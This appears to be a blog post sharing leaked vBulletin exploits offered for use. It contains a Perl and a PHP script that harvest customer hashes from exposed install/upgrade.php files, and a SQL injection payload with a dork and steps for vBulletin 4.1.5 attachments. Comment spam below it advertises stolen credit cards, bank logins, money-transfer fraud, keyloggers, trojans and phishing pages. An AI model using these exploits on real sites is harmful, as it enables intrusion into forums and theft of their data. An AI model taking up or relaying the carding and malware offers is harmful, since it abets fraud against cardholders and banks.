vBulletin x.x.x Customer Area 0day
PHP Code:
Bulletin x.x.x Customer Area 0day
Perl script got leaked so decided to post the perl script here
Code:#!/usr/bin/perluse LWP::UserAgent;
use HTTP::Request::Common;
system('cls');system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";
if($#ARGV == -1 or $#ARGV > 0){
print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}
$domain = $ARGV[0];$install_dir = "install";$full_domain = "http://$domain/$install_dir/upgrade.php";chop($domain);
&search;
sub search{$url = $full_domain;$lwp = LWP::UserAgent->new();$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");$request = $lwp->post($url, ["searchHash" => "Search"]);
print " Searching $domain ----\n ";
if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "Result : $1\n";
} else {
print "Hash: Hash not found!\n";
}
}
php exploit -
--------------------
<!--?php
set_time_limit(0);
if($argc < 2) {
echo "Usage: {$argv[0]} http://site.ru/forum" . PHP_EOL;
exit;
}
$URL = $argv[1];$arr = parse_url($URL);
### work with urlif(strpos($URL, '?')) die("Ohh, your URL is not valid");
if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
if(!$arr['scheme']) $URL = 'http://' . $URL;
$headers = get_headers($URL . '/install/upgrade.php');
if(substr($headers[0], 9, 3) == '200') {
$source = file_get_contents($URL . "/install/upgrade.php");
}
elseif($headers = get_headers($URL . '/install/finalupgrage.php')) {
if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php");
}
else die("something went wrong...");
preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
echo "Hash: " . $hash . PHP_EOL;
$fp = fopen("hash.txt", "a+");
fwrite($fp, $hash . PHP_EOL);
}?>vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit
PHP Code:
vBulletin 4.1.x / 5.x.x Upgrade 0day ExploitCreated by: BoxheadFound on: 08/22/2013Website: http://belegit.netExample:http://test.com/forum/install/upgrade.php
Website:
Customer ID:
Username:
Password:
Email: vbulletin 4.1.5 attachment SQLI
PHP Code:
vbulletin 4.1.5 attachment SQLI
examine variables came across sq-injection, as later found to be inherent to all vbulletin 4.1.5. Title: Vulnerability in vBulletin 4.1.5 Dork: Powered by Powered by vBulletin 4.1.5 Conditions: The account on the forum. Permission to attach files to messages / themes (attachments) Register -> go to the forum -> click a topic or if the board is, you can choose to create an article (the second option more work) -> at the bottom looking Attachments 'Manage Attachments' - > Open the window and setting "values [f]" insert our SQL query. Example:Code:http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1After that, we see the standard error of the database offline, thus opening the source code of the page and see:
Code:
<!-- - Database error in vBulletin 4.1.5 : Invalid SQL :
SELECT
permissionsfrom , Hidden , setpublish , publishdate , userid
FROM ds23fSDdfsdf_cms_node
WHERE
nodeid = - 1599 or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const ( version (), 1 )) a ); MySQL Error : Duplicate column Name .1.49-3 '5 ' Error Number : 1060
What iz this........
ReplyDeletehow to use?
its a 0day Vbulletin exploit.... br0...... :)
DeleteHello world
DeleteI teach hacking andriod apk virus - windows Hacking - web server hacking -
Reseller :- Hacking Tools & Hacking services, Also Teach Hacking Methods Via teem weaver or Anydesk,
Each Method Take minimum 1 hour to learn with vedio Tutorial And Hacking Tools ,
How to Make Money hacking tools,
- Spamming & Tools ,
- Carding & Tools ,
- Virus with control panal and Spy bot files,
- Virus With Builder And Crypter ,
- Scanners with Bruters ,
- Crypters with Doc Exploits ,pdf Exploits ,TExtfile Exploits ,
- PHP Exploits with shell and mailer
- OTP verications Bypass with Bulletproof Scam-page and Otp control
- Company Ceo or cfo leads Any country
- Rat virus with builder
- Cookies Stealers and Builder
- keyloger and builder
- Credit card Scam-pages
- Bank login Scam-pages
- debit card topup scam page
- donation scam-page
- dhl login and tracking scam-page
- fedax login and tracking scam-page
- Shipping Tools
Place & Ground
learners you will pay cheap $ for demo Tools & Method
Business grounds
Credit card Low Interest Services,
- Credit card with Fullz Information - Minimum Investment 150$ - With 50k Credit limit And balance
- Debit Card Topup AS per Card limit - Minimum Investment 200$ - With 8000$ balance
- Dating scam Fresh male female Logins - Minimum Investment 80$ - Dating Login upto 30
-----------------
ABOUT US :
Icq :-675452902
Skype: rushr00t000
email me:- hackitbackd00r@gmail.com
. . Hello Dears
Delete. . I am reseller of Hacking services
. . Ethical Hacking tools & services
-----------------------------------
. . credit card
. . debit card
. . Shopping gift card
. . bank transfer
. . western union Transfer
. . paid your bills
. . Email Accounts
. . PayPal Accounts
. . i cloud Accounts
. . CEO OR CFO Leads
........ Spamming tools .......
. . cpnal 7$
. . web mailer 6$
. . mailer 5$
. . random scam page 30$
. . smtp 25$
. . shell 5$
........ Carding tools .......
. . admin rdp 30$ any county
. . random rdp 8$ any county
. . Ssh roots 40$
. . vpn 35$
. . sock 30$
........ Spy virus .......
. . keylogger 120$
. . Zeus Trojan 200$
. . rat virus 130$
........ About us .......
..ShaunWells000@gmail.com
..Skype:ShaunWells000
contact us
Selling good and fresh cvv fullz
ReplyDeletetrack 1 and 2 with pin
bank login
bank transfer
writing cheques
transfer to cc ...
Sell Fresh CVV - Western Union Transfer - Bank Login - Card Dumps - Paypal - Ship
Fresh Cards, Selling Dumps, Cvvs, Fullz
Tickets,Hotels,Credit card topup...Paypal transfer, Mailer,Smtp,western union login,
Book Flight Online
SELL CVV GOOD And HACK BIG CVV GOOD Credit Card
Fresh Cards. Selling Dumps, Cvvs, Fullz.Tickets,Hotels,Credit cards
Sell Cvv(cc) - Wu Transfer - Card Dumps - Bank login/paypal
And many more other hacking services
contact me : hackerw169@gmail.com
ICQ: 699 396 818
- I have account paypal with good balance
- I hope u good customers and will be long-term cooperation
Prices Western Union Online Transfer
-Transfer(Eu,Uk,Asia,Canada,Us,France,Germany,Italy and very
easy to do African)
- 200$ = 1500$ (MTCN and sender name + country sender)
- 350$ = 4000$ (MTCN and sender name + country sender)
- 500$ = 6000$ (MTCN and sender name + country sender)
- 600$ = 8000$ (MTCN and sender name + country sender)
Then i will do transfer's for you, After about 30 mins you'll have
MTCN and sender name + country sender
- Dumps prices
- Tracks 1&2 US = 85$ per 1
- Tracks 1&2 UK = 100$ per 1
- Tracks 1&2 CA / AU = 110$ per 1
- Tracks 1&2 EU = 120$ per 1
Bank Logins Prices US UK CA AU EU
- Bank Us : ( HALIFAX,BOA,CHASE,Wells Fargo...)
. Balance 5000$ = 250$
. Balance 8000$ = 400$
. Balance 12000$ = 600$
. Balance 15000$ = 800$
. Balance 20000$ = 1000$
- Bank UK : ( LLOYDS TSB,BARCLAYS,Standard Chartered,HSBC...)
. Balance 5000 GBP = 300 GBP
. Balance 12000 GBP = 600 GBP
. Balance 16000 GBP = 700 GBP
. Balance 20000 GBP = 1000 GBP
. Balance 30000 GBP = 1200 GBP
contact me : hackerw169@gmail.com
ICQ: 699 396 818